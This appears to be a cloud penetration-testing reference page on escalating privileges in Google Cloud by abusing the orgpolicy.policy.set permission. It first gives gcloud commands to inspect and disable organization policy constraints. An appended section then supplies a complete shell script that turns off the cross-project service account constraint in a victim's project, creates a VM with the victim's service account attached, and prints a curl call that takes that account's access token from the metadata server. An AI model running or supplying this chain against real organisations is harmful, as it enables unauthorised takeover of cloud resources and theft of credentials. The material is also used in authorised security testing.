# GCP - Orgpolicy Privesc


## orgpolicy

### `orgpolicy.policy.set`

An attacker with `orgpolicy.policy.set` can modify organization policies, which lets them remove constraints that block specific operations. For example, the constraint `appengine.disableCodeDownload` normally prevents downloading App Engine source code. An attacker holding `orgpolicy.policy.set` can disable enforcement of that constraint and then download the source code it was protecting.

<details>
<summary>Get org policy info and disable enforcement</summary>

```bash
# Get info (replace <CONSTRAINT> with e.g. appengine.disableCodeDownload;
# exactly one of --folder / --organization / --project is required)
gcloud resource-manager org-policies describe <CONSTRAINT> [--folder=<ID> | --organization=<ID> | --project=<ID>]

# Disable enforcement at the chosen level
gcloud resource-manager org-policies disable-enforce <CONSTRAINT> [--folder=<ID> | --organization=<ID> | --project=<ID>]
```
</details>

A Python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).

### `orgpolicy.policy.set`, `iam.serviceAccounts.actAs`

Normally it is not possible to attach a service account from a different project to a resource, because an enforced policy constraint called **`iam.disableCrossProjectServiceAccountUsage`** prevents it.

You can check whether this constraint is being enforced by running the following command:

<details>
<summary>Check the cross-project service account constraint</summary>

```bash
gcloud resource-manager org-policies describe \
  constraints/iam.disableCrossProjectServiceAccountUsage \
  --project=<project-id> \
  --effective
```

Example output when the constraint is enforced:

```yaml
booleanPolicy:
  enforced: true
constraint: constraints/iam.disableCrossProjectServiceAccountUsage
```
</details>

This stops an attacker who holds `iam.serviceAccounts.actAs` on a service account in another project from attaching that service account to a resource (for example a new VM) in a project where they do have the infrastructure permissions to create it, which would otherwise be a privilege escalation path.

However, an attacker with the `orgpolicy.policy.set` permission can bypass this restriction by disabling the `iam.disableCrossProjectServiceAccountUsage` constraint itself. Note that the constraint is evaluated on the project that owns the service account, so it has to be disabled there (or at a folder or organization above it), not on the project where the resource is created. Once it is off, the attacker can attach the other project's service account to a resource in a project they control and escalate privileges through it.

<details>
<summary>Disable the cross-project service account constraint</summary>

```bash
gcloud resource-manager org-policies disable-enforce \
  iam.disableCrossProjectServiceAccountUsage \
  --project=<project-id>
```
</details>
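The two procedures above (disabling a constraint such as `appengine.disableCodeDownload`, and disabling `iam.disableCrossProjectServiceAccountUsage` so another project's service account can be attached) share the same steps, so here is one worked script covering both. This is an added example, not code from the original page or from the RhinoSecurityLabs script: it parses the effective policy that `gcloud resource-manager org-policies describe --effective` prints, disables enforcement, re-checks, and then creates a VM in an attacker-controlled project with the cross-project service account attached. The instance name `priv-vm`, the `<project-id>`-style placeholders and the sample service-account email are assumptions; the gcloud commands and the metadata-server token URL are real.

```shell
#!/bin/sh
# Added example (not from the original page): check whether an org policy
# boolean constraint is enforced, disable enforcement with orgpolicy.policy.set,
# and then use the freed-up capability. Placeholders in <angle brackets> and
# the sample service-account email are assumptions, not real resources.
set -eu

# Print "enforced" or "not_enforced" for the YAML that
# `gcloud resource-manager org-policies describe --effective` emits on stdin.
# A boolean constraint is active only when booleanPolicy.enforced is true;
# `booleanPolicy: {}` or a missing booleanPolicy block means it is off.
enforcement_state() {
  if grep -Eq '^[[:space:]]*enforced:[[:space:]]*true[[:space:]]*$'; then
    echo enforced
  else
    echo not_enforced
  fi
}

# Effective state of a constraint on a project (needs orgpolicy.policy.get).
check_constraint() {
  gcloud resource-manager org-policies describe "$1" \
    --project="$2" --effective | enforcement_state
}

# Abuse orgpolicy.policy.set: switch enforcement off and confirm it took effect.
bypass_constraint() {
  constraint="$1"; project="$2"
  if [ "$(check_constraint "$constraint" "$project")" = not_enforced ]; then
    echo "[*] $constraint is already not enforced on $project"
    return 0
  fi
  gcloud resource-manager org-policies disable-enforce "$constraint" \
    --project="$project" >/dev/null
  state="$(check_constraint "$constraint" "$project")"
  echo "[*] $constraint on $project is now: $state"
  [ "$state" = not_enforced ]
}

# The cross-project constraint is evaluated on the project that OWNS the
# service account, so derive that project from the SA email.
sa_project_from_email() {
  # victim-sa@victim-project.iam.gserviceaccount.com -> victim-project
  printf '%s\n' "$1" | sed -n 's/^[^@]*@\([^.]*\)\.iam\.gserviceaccount\.com$/\1/p'
}

# Chain for the orgpolicy.policy.set + iam.serviceAccounts.actAs case:
# 1) disable the constraint in the SA's project, 2) create a VM in the
# attacker-controlled project with that SA attached, 3) read the SA token
# from the metadata server once on the box.
attach_cross_project_sa() {
  sa_email="$1"; attacker_project="$2"; zone="$3"
  sa_project="$(sa_project_from_email "$sa_email")"
  [ -n "$sa_project" ] || { echo "not a service-account email: $sa_email" >&2; return 1; }
  bypass_constraint iam.disableCrossProjectServiceAccountUsage "$sa_project"
  gcloud compute instances create priv-vm \
    --project="$attacker_project" --zone="$zone" \
    --service-account="$sa_email" --scopes=cloud-platform
  echo "[*] on the VM run:"
  echo "    curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
}

# Example invocations (placeholders):
#   bypass_constraint appengine.disableCodeDownload <project-id>
#   attach_cross_project_sa victim-sa@<victim-project-id>.iam.gserviceaccount.com <attacker-project-id> us-central1-a
```

The parser deliberately treats anything other than an explicit `enforced: true` as "not enforced", which matches how a boolean constraint behaves after `disable-enforce`. Besides the constraint, Google's documented prerequisites for cross-project attachment also include `roles/iam.serviceAccountUser` for the caller on the service account and `roles/iam.serviceAccountTokenCreator` on it for the resource project's Compute Engine service agent, so `instances create` can still fail if those are missing.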
